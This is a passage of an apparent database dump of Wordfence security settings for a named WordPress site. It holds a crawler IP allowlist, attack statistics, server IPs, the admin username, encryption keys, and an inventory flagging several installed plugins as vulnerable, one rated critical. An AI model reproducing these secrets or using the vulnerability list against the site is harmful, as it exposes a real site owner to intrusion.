.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('touppPromptNeeded','','yes'),('touppBypassNextCheck','0','yes'),('autoUpdateAttempts','0','yes'),('lastScanCompleted','ok','yes'),('previousWflogsFileList','[\"template.php\",\"config-transient.php\",\"GeoLite2-Country.mmdb\",\".htaccess\",\"rules.php\",\"attack-data.php\",\"ips.php\",\"config-livewaf.php\",\"config-synced.php\",\"config.php\"]','yes'),('diagnosticsWflogsRemovalHistory','[]','no'),('encKey','68a543a041a38593','yes'),('longEncKey','71827d5ac8f0140666d80ebcbd44ef07945e8ff1f0235654e9349d047c46a72c','yes'),('cbl_restOfSiteBlocked','1','yes'),('lastBlockAggregation','1705057866','yes'),('allowed404s6116Migration','1','yes'),('migration636_email_summary_excluded_directories','1','no'),('fileContentsGSB6315Migration','1','yes'),('config701Migration','1','yes'),('blocks702Migration','1','yes'),('lastScanFailureType','','yes'),('scansEnabled_geoipSupport','1','yes'),('config720Migration','1','yes'),('waf_status','enabled','yes'),('detectProxyNextCheck','1705590066','no'),('detectProxyNonce','','no'),('serverIP','1704985267;68.65.120.177','yes'),('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1705243200;s:4:\"args\";a:1:{i:0;i:1705243200;}}i:1;a:2:{s:9:\"timestamp\";i:1705502400;s:4:\"args\";a:1:{i:0;i:1705502400;}}}','yes'),('activatingIP','178.239.164.65','yes'),('cbl_cookieVal','64f415836d7ed','yes'),('serverDNS','1705005274;300;172.67.153.91','yes'),('wp_home_url','https://tummyrevolution.com','yes'),('wp_site_url','https://tummyrevolution.com','yes'),('totalLoginHits','12452','yes'),('totalIPsBlocked','7410','yes'),('total503s','7611','yes'),('lastLiteSpdEmail','1704137627','yes'),('dbVersion','10.5.20-MariaDB-cll-lve-log','yes'),('allowMySQLi','1','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"2d93141140758b085b7780bcabc912eb70493fb82338bfca6be0dc2c0cc9ae48\";}','no'),('timeoffset_wf','0','yes'),('vulnerabilities_plugin','a:15:{i:0;a:7:{s:4:\"slug\";s:13:\"backup-backup\";s:11:\"fromVersion\";s:5:\"1.3.3\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:5:\"1.4.1\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=plugin\";s:5:\"score\";s:4:\"9.80\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\";}i:1;a:5:{s:4:\"slug\";s:17:\"copy-delete-posts\";s:11:\"fromVersion\";s:5:\"1.4.3\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"1.4.4\";s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:15:\"litespeed-cache\";s:11:\"fromVersion\";s:3:\"5.7\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:7:\"6.0.0.1\";s:4:\"link\";b:0;}i:3;a:7:{s:4:\"slug\";s:9:\"mailmunch\";s:11:\"fromVersion\";s:5:\"3.1.2\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:5:\"3.1.6\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/f6409626-c8cb-412c-aff3-cbb2da212e5d?source=plugin\";s:5:\"score\";s:4:\"4.30\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\";}i:4;a:5:{s:4:\"slug\";s:25:\"php-compatibility-checker\";s:11:\"fromVersion\";s:5:\"1.6.2\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"1.6.3\";s:4:\"link\";b:0;}i:5;a:5:{s:4:\"slug\";s:14:\"instagram-feed\";s:11:\"fromVersion\";s:5:\"6.2.4\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"6.2.7\";s:4:\"link\";b:0;}i:6;a:5:{s:4:\"slug\";s:14:\"w3-total-cache\";s:11:\"fromVersion\";s:5:\"2.5.0\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:5:\"2.6.1\";s:4:\"link\";b:0;}i:7;a:7:{s:4:\"slug\";s:11:\"woocommerce\";s:11:\"fromVersion\";s:5:\"8.2.0\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:5:\"8.4.0\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/eb8517bc-f45f-40a1-ae80-ed227c8b32d7?source=plugin\";s:5:\"score\";s:4:\"4.30\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\";}i:8;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:6:\"7.10.4\";s:10:\"vulnerable\";b:0;s:9:\"toVersion\";s:6:\"7.11.1\";s:4:\"link\";b:0;}i:9;a:7:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"fromVersion\";s:3:\"6.1\";s:10:\"vulnerable\";b:1;s:9:\"toVersion\";s:3:\"7.3\";s:4:\"link\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/1fab5d06-ff39-4b7c-808b-bd199c2a3329?source=plugin\";s:5:\"score\";s:4:\"6.40\";s:6:\"vector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\";}i:10;a:4:{s:4:\"slug\";s:7:\"akismet\";s:11:\"fromVersion\";s:3:\"5.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:11;a:4:{s:4:\"slug\";s:14:\"contact-form-7\";s:11:\"fromVersion\";s:5:\"5.8.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:4:{s:4:\"slug\";s:13:\"envato-market\";s:11:\"fromVersion\";s:6:\"2.0.10\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:4:{s:4:\"slug\";s:11:\"select-core\";s:11:\"fromVersion\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:4:{s:4:\"slug\";s:9:\"revslider\";s:11:\"fromVersion\";s:6:\"6.6.16\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:7:{i:0;a:5:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.7\";s:11:\"fromVersion\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:15:\"twentyseventeen\";s:9:\"toVersion\";s:3:\"3.4\";s:11:\"fromVersion\";s:3:\"2.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:13:\"twentysixteen\";s:9:\"toVersion\";s:3:\"3.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:5:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"2.4\";s:11:\"fromVersion\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:5:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"2.0\";s:11:\"fromVersion\";s:3:\"1.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:5:{s:4:\"slug\";s:17:\"twentytwentythree\";s:9:\"toVersion\";s:3:\"1.3\";s:11:\"fromVersion\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:5:{s:4:\"slug\";s:15:\"twentytwentytwo\";s:9:\"toVersion\";s:3:\"1.6\";s:11:\"fromVersion\";s:3:\"1.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('lastNotificationID','671','no'),('wordpressVersion','6.4.2','yes'),('wordpressPluginVersions','a:15:{s:7:\"akismet\";s:3:\"5.3\";s:13:\"backup-backup\";s:5:\"1.3.3\";s:14:\"contact-form-7\";s:5:\"5.8.6\";s:17:\"copy-delete-posts\";s:5:\"1.4.3\";s:13:\"envato-market\";s:6:\"2.0.10\";s:15:\"litespeed-cache\";s:3:\"5.7\";s:9:\"mailmunch\";s:5:\"3.1.2\";s:25:\"php-compatibility-checker\";s:5:\"1.6.2\";s:11:\"select-core\";s:3:\"1.2\";s:9:\"revslider\";s:6:\"6.6.16\";s:14:\"instagram-feed\";s:5:\"6.2.4\";s:14:\"w3-total-cache\";s:5:\"2.5.0\";s:11:\"woocommerce\";s:5:\"8.2.0\";s:9:\"wordfence\";s:6:\"7.10.4\";s:11:\"js_composer\";s:3:\"6.1\";}','yes'),('wordpressThemeVersions','a:9:{s:10:\"succulents\";s:3:\"1.3\";s:14:\"twentynineteen\";s:3:\"1.4\";s:15:\"twentyseventeen\";s:3:\"2.2\";s:13:\"twentysixteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.1\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:15:\"twentytwentyone\";s:3:\"1.9\";s:17:\"twentytwentythree\";s:3:\"1.2\";s:15:\"twentytwentytwo\";s:3:\"1.5\";}','yes'),('lastDashboardCheck','1704989096','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1704986817;s:3:\"tdf\";a:3:{s:9:\"community\";i:5903;s:7:\"premium\";i:5910;s:9:\"blacklist\";i:9131;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1704898800;s:1:\"c\";i:12166421;}i:1;a:2:{s:1:\"t\";i:1704902400;s:1:\"c\";i:11853275;}i:2;a:2:{s:1:\"t\";i:1704906000;s:1:\"c\";i:12782848;}i:3;a:2:{s:1:\"t\";i:1704909600;s:1:\"c\";i:13261441;}i:4;a:2:{s:1:\"t\";i:1704913200;s:1:\"c\";i:13254538;}i:5;a:2:{s:1:\"t\";i:1704916800;s:1:\"c\";i:12627162;}i:6;a:2:{s:1:\"t\";i:1704920400;s:1:\"c\";i:12015317;}i:7;a:2:{s:1:\"t\";i:1704924000;s:1:\"c\";i:11652460;}i:8;a:2:{s:1:\"t\";i:1704927600;s:1:\"c\";i:11489815;}i:9;a:2:{s:1:\"t\";i:1704931200;s:1:\"c\";i:11433491;}i:10;a:2:{s:1:\"t\";i:1704934800;s:1:\"c\";i:11259198;}i:11;a:2:{s:1:\"t\";i:1704938400;s:1:\"c\";i:11448358;}i:12;a:2:{s:1:\"t\";i:1704942000;s:1:\"c\";i:11708142;}i:13;a:2:{s:1:\"t\";i:1704945600;s:1:\"c\";i:13781398;}i:14;a:2:{s:1:\"t\";i:1704949200;s:1:\"c\";i:19916070;}i:15;a:2:{s:1:\"t\";i:1704952800;s:1:\"c\";i:18816998;}i:16;a:2:{s:1:\"t\";i:1704956400;s:1:\"c\";i:18153875;}i:17;a:2:{s:1:\"t\";i:1704960000;s:1:\"c\";i:17902919;}i:18;a:2:{s:1:\"t\";i:1704963600;s:1:\"c\";i:17016021;}i:19;a:2:{s:1:\"t\";i:1704967200;s:1:\"c\";i:16507584;}i:20;a:2:{s:1:\"t\";i:1704970800;s:1:\"c\";i:15865674;}i:21;a:2:{s:1:\"t\";i:1704974400;s:1:\"c\";i:14648600;}i:22;a:2:{s:1:\"t\";i:1704978000;s:1:\"c\";i:13105712;}i:23;a:2:{s:1:\"t\";i:1704981600;s:1:\"c\";i:12631585;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1704326400;s:1:\"c\";i:303745097;}i:1;a:2:{s:1:\"t\";i:1704412800;s:1:\"c\";i:339035448;}i:2;a:2:{s:1:\"t\";i:1704499200;s:1:\"c\";i:393774021;}i:3;a:2:{s:1:\"t\";i:1704585600;s:1:\"c\";i:345653145;}i:4;a:2:{s:1:\"t\";i:1704672000;s:1:\"c\";i:294121344;}i:5;a:2:{s:1:\"t\";i:1704758400;s:1:\"c\";i:329161142;}i:6;a:2:{s:1:\"t\";i:1704844800;s:1:\"c\";i:321972265;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1702339200;s:1:\"c\";i:325155710;}i:1;a:2:{s:1:\"t\";i:1702425600;s:1:\"c\";i:328580516;}i:2;a:2:{s:1:\"t\";i:1702512000;s:1:\"c\";i:329149222;}i:3;a:2:{s:1:\"t\";i:1702598400;s:1:\"c\";i:336267148;}i:4;a:2:{s:1:\"t\";i:1702684800;s:1:\"c\";i:300622047;}i:5;a:2:{s:1:\"t\";i:1702771200;s:1:\"c\";i:311833173;}i:6;a:2:{s:1:\"t\";i:1702857600;s:1:\"c\";i:333784876;}i:7;a:2:{s:1:\"t\";i:1702944000;s:1:\"c\";i:301909036;}i:8;a:2:{s:1:\"t\";i:1703030400;s:1:\"c\";i:278915431;}i:9;a:2:{s:1:\"t\";i:1703116800;s:1:\"c\";i:276901211;}i:10;a:2:{s:1:\"t\";i:1703203200;s:1:\"c\";i:250510204;}i:11;a:2:{s:1:\"t\";i:1703289600;s:1:\"c\";i:347292447;}i:12;a:2:{s:1:\"t\";i:1703376000;s:1:\"c\";i:279571395;}i:13;a:2:{s:1:\"t\";i:1703462400;s:1:\"c\";i:290737156;}i:14;a:2:{s:1:\"t\";i:1703548800;s:1:\"c\";i:243002201;}i:15;a:2:{s:1:\"t\";i:1703635200;s:1:\"c\";i:279191795;}i:16;a:2:{s:1:\"t\";i:1703721600;s:1:\"c\";i:288027641;}i:17;a:2:{s:1:\"t\";i:1703808000;s:1:\"c\";i:271963322;}i:18;a:2:{s:1:\"t\";i:1703894400;s:1:\"c\";i:268311256;}i:19;a:2:{s:1:\"t\";i:1703980800;s:1:\"c\";i:363129249;}i:20;a:2:{s:1:\"t\";i:1704067200;s:1:\"c\";i:330577770;}i:21;a:2:{s:1:\"t\";i:1704153600;s:1:\"c\";i:325271151;}i:22;a:2:{s:1:\"t\";i:1704240000;s:1:\"c\";i:271641526;}i:23;a:2:{s:1:\"t\";i:1704326400;s:1:\"c\";i:303745097;}i:24;a:2:{s:1:\"t\";i:1704412800;s:1:\"c\";i:339035448;}i:25;a:2:{s:1:\"t\";i:1704499200;s:1:\"c\";i:393774021;}i:26;a:2:{s:1:\"t\";i:1704585600;s:1:\"c\";i:345653145;}i:27;a:2:{s:1:\"t\";i:1704672000;s:1:\"c\";i:294121344;}i:28;a:2:{s:1:\"t\";i:1704758400;s:1:\"c\";i:329161142;}i:29;a:2:{s:1:\"t\";i:1704844800;s:1:\"c\";i:321972265;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:655558740;}i:1;a:2:{s:2:\"cd\";s:2:\"NL\";s:2:\"ct\";i:256383773;}i:2;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:195700798;}i:3;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:181988571;}i:4;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:134236718;}i:5;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:105469595;}i:6;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:84302639;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:74584482;}i:8;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:57802075;}i:9;a:2:{s:2:\"cd\";s:2:\"ID\";s:2:\"ct\";i:40998216;}}}}','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|ceo|cfa|cfd|cpa|crs|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|scb|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|actor|aero|adult|aetna|africa|agency|airbus|agakhan|airforce|airtel|akdn|ally|amex|arab|army|arpa|arte|asda|auto|baby|band|bank|bbva|archi|asia|audi|audio|beer|blog|buzz|autos|cafe|call|camp|care|cars|casa|case|cash|citi|city|cool|coop|desi|diet|dish|docs|dvag|fans|fast|fido|film|fire|fish|free|game|apple|fund|gbiz|gent|kred|land|seek|sexy|shaw|shia|azure|best|bike|bing|blue|bofa|bond|book|cbre|cern|chat|date|dclk|cisco|cyou|data|click|chrome|club|deal|dell|erni|fail|flir|food|ford|bingo|black|boats|ggee|cards|gift|author|citic|fage|farm|kids|baidu|beats|bible|build|circle|cloud|coach|sener|center|codes|kiwi|chanel|auction|canon|scot|bosch|chase|cheap|kpmg|seven|shell|church|sharp|casino|seat|shoes|audible|beauty|berlin|skin|aramco|skype|bharti|sling|star|aquarelle|bayern|bostik|smart|smile|sncf|spot|apartments|sohu|solar|surf|boston|broker|show|athleta|attorney|associates|camera|shop|career|silk|sina|talk|team|clinic|taxi|coffee|site|claims|giving|gmbh|auspost|gold|golf|bentley|guge|guru|hair|haus|hdfc|help|bestbuy|flowers|goog|here|host|hsbc|icbc|ieee|imdb|immo|info|itau|java|jeep|jobs|jprs|kddi|maif|pink|photo|pics|prof|phone|ping|prod|qpon|pizza|play|plus|pohl|porn|post|place|poker|praxi|press|prime|promo|read|bauhaus|reise|avianca|banamex|bananarepublic|reit|rent|rehab|rest|rich|sarl|save|saxo|radio|ricoh|safe|sale|sony|quest|ruhr|rocks|room|rsvp|rodeo|rugby|barcelona|basketball|barclaycard|salon|barclays|barefoot|bargains|baseball|song|tech|anquan|drive|dubai|dupont|earth|edeka|email|epson|fedex|gucci|guide|house|abbott|dunlop|hyatt|abbvie|abogado|xbox|ikano|direct|durban|emerck|energy|vana|doctor|estate|faith|final|gallo|gives|globo|gmail|honda|events|gallup|games|expert|family|glass|garden|george|gifts|global|google|green|gripe|group|hermes|ubank|xerox|gratis|health|horse|hiphop|vegas|vivo|video|wang|wien|homes|visa|viva|vote|voto|vodka|weir|volvo|wiki|insure|wine|wales|work|watch|intuit|weber|weibo|works|hughes|imamat|alibaba|world|hockey|hotels|academy|abudhabi|android|zara|crown|dabur|dance|forum|amazon|cymru|alstom|teva|koeln|zero|lawyer|lease|alsace|tiaa|coupon|kyoto|latino|tips|tires|tmall|americanexpress|americanfamily|amica|irish|jetzt|lamer|space|sport|comsec|condos|amsterdam|analytics|delta|zone|amfam|deals|stada|store|study|style|tatar|flickr|forex|sucks|swiss|tirol|today|yoga|allfinanz|credit|cruise|dating|trade|alipay|trust|datsun|dental|futbol|juegos|tube|tunes|dealer|degree|design|jaguar|joburg|kaufen|town|toys|total|tours|yahoo|accenture|accountant|kindle|toray|allstate|tools|accountants|tokyo|kosher|tushu|blackfriday|lefrak|blockbuster|booking|careers|viajes|chintai|cipriani|christmas|unicom|charity|capetown|capital|channel|catering|catholic|capitalone|caravan|cleaning|legal|lego|tennis|tienda|tjmaxx|toyota|travel|calvinklein|tkmaxx|citadel|viking|villas|virgin|voyage|walter|webcam|xihuan|brother|voting|college|business|clubmed|cologne|clinique|comcast|clothing|commbank|company|compare|computer|vision|community|consulting|contact|contractors|cooking|builders|corsica|country|coupons|courses|cricket|cruises|delivery|deloitte|dentist|digital|domains|exposed|farmers|fashion|democrat|express|ferrari|fitness|diamonds|ferrero|education|fishing|flights|download|finance|florist|forsale|discover|yandex|fresenius|boehringer|discount|firestone|frontier|directory|firmdale|frogans|fujitsu|gallery|genting|grocery|hamburg|hangout|hitachi|bloomberg|football|godaddy|guitars|holiday|hosting|hotmail|hyundai|ismaili|jewelry|juniper|komatsu|lasalle|latrobe|homedepot|kitchen|lacaixa|lanxess|industries|leclerc|immobilien|theater|ipiranga|jpmorgan|homegoods|istanbul|homesense|hospital|temasek|theatre|infiniti|pharmacy|tickets|creditunion|toshiba|cuisinella|institute|trading|training|verisign|insurance|ventures|zappos|foundation|vanguard|kuokgroup|vacations|walmart|creditcard|lancaster|landrover|investments|international|university|wanggou|bnpparibas|travelers|watches|yachts|whoswho|broadway|weather|bradesco|website|wedding|ericsson|exchange|goldpoint|holdings|extraspace|guardian|fairwinds|eurovision|feedback|fidelity|goodyear|grainger|graphics|bridgestone|technology|windows|xfinity|boutique|brussels|winners|engineer|financial|furniture|hdfcbank|helsinki|woodside|equipment|xn--90ae|hisamitsu|xn--90ais|xn--c1avg|xn--d1alf|xn--e1a4c|xn--fhbei|xn--j1aef|xn--9et52u|xn--node|xn--j1amh|xn--9dbq2a|xn--l1acc|zuerich|xn--80aswg|xn--90a3ac|xn--ngbrx|xn--nqv7f|xn--5tzm5g|xn--c2br7g|xn--cg4bki|xn--czru2d|xn--p1acf|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--io0a7i|xn--p1ai|xn--czrs0t|xn--qxa6a|xn--55qx5d|xn--qxam|healthcare|xn--pssy2u|xn--unup4y|enterprises|vlaanderen|yokohama|xn--tckwe|youtube|xn--o3cw4h|xn--vhquv|xn--4gbrim|yamaxun|xn--30rr7y|xn--3pxu8k|xn--45q11c|xn--kput3i|xn--mxtq1m|xn--wgbh1c|xn--wgbl6a|engineering|xn--q7ce6a|yodobashi|xn--y9a3aq|kerryhotels|lexus|lgbt|lidl|life|like|lilly|limo|link|lipsy|live|loan|lotte|next|lotto|love|locus|ltda|luxe|locker|luxury|mango|media|meet|loans|meme|menu|miami|mini|mint|mobi|moda|money|moto|movie|name|navy|news|nexus|nico|nike|nikon|ninja|living|nokia|london|nowtv|madrid|music|maison|paris|pars|parts|party|pccw|makeup|market|page|mattel|mobile|monash|mormon|moscow|museum|nagoya|natura|nissan|nissay|norton|nowruz|office|olayan|otsuka|pfizer|photos|physio|pictet|repair|netbank|netflix|neustar|nextdirect|reisen|network|okinawa|oldnavy|ollo|online|open|omega|oracle|osaka|observer|orange|philips|photography|pioneer|olayangroup|organic|origins|politie|partners|pictures|properties|property|panasonic|pramerica|playstation|protection|quebec|racing|rentals|plumbing|progressive|reliance|realestate|realtor|productions|realty|recipes|redstone|redumbrella|report|safety|lincoln|lplfinancial|lundbeck|soccer|social|limited|management|marketing|markets|marriott|marshalls|monster|construction|lighting|memorial|merckmsd|mortgage|shangrila|shiksha|mckinsey|melbourne|saarland|shopping|shouji|singles|softbank|software|solutions|staples|stcgroup|statebank|lamborghini|lifeinsurance|lifestyle|storage|stream|studio|supply|sydney|taobao|target|tattoo|support|taipei|surgery|suzuki|swatch|systems|statefarm|supplies|kerrylogistics|kerryproperties|microsoft|stockholm|mitsubishi|prudential|restaurant|sakura|republican|review|school|schule|reviews|rexroth|richardli|motorcycles|rogers|ryukyu|sanofi|samsclub|samsung|select|schmidt|services|schaeffler|science|search|secure|sandvik|schwarz|security|tatamotors|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--45brj9c|xn--55qw42g|xn--9krt00a|xn--cck2b3b|xn--efvy88h|xn--cckwcxetd|xn--rhqv96g|xn--rovu88b|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--w4rs40l|xn--45br5cyl|xn--vuq861b|xn--xhq521b|xn--zfr164b|scholarships|versicherung|xn--3e0b707e|xn--4dbrk0ce|xn--tiq49xqyj|xn--yfro4i67o|xn--ygbi2ammx|weatherchannel|williamhill|xn--flw351e|xn--g2xx48c|wolterskluwer|xn--42c2d9a|xn--6frz82g|xn--eckvdtc9d|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--80ao21a|xn--80adxhks|xn--fjq720a|xn--80aqecdr1a|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--b4w605ferd|xn--czr694b|xn--gecrj9c|xn--gk3at1e|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--imr513n|xn--j6w193g|sandvikcoromant|xn--d1acj3b|xn--fct429k|xn--fiq228c5hs|xn--h2breg3eve|xn--jlq480n2rg|xn--qcka1pmc|xn--lgbbat1ad8j|xn--mgbbh1a|xn--mgbab2bd|xn--bck1b9a5dre4c|xn--jvr189m|xn--kprw13d|xn--kpry57d|xn--mgb9awbf|xn--mgba3a3ejt|xn--i1b6b1a6a2e|xn--5su34j936bgsg|xn--kcrx77d1x4a|xn--mgba3a4f16a|xn--fzys8d69uvgm|xn--mgba7c0bbn0a|xn--mgbaam7a8h|xn--mgbcpq6gpa1a|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--clchc0ea0b2g2a9gcd|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--q9jyb4c|xn--ngbe9e0a|xn--mgbi4ecexp|travelersinsurance|xn--pgbs0dh|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--nyqy26a|xn--otu796d|xn--mgbgu82a|xn--ogbpf8fl|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--ngbc5azd|xn--nqv7fs00ema|xn--rvc1e0am3e|xn--vermgensberater-ctb|xn--w4r85el8fhu5dnra|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--vermgensberatung-pwb|','yes'),('tldlistHash','23bffb10e6fcb52e0fac711daa1129ce203a46f1dd39d4359c76f8246ee54bd8','yes'),('noc1ScanSchedule','a:2:{i:0;i:1705243200;i:1;i:1705502400;}','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:29:\"Tue 17th October @ 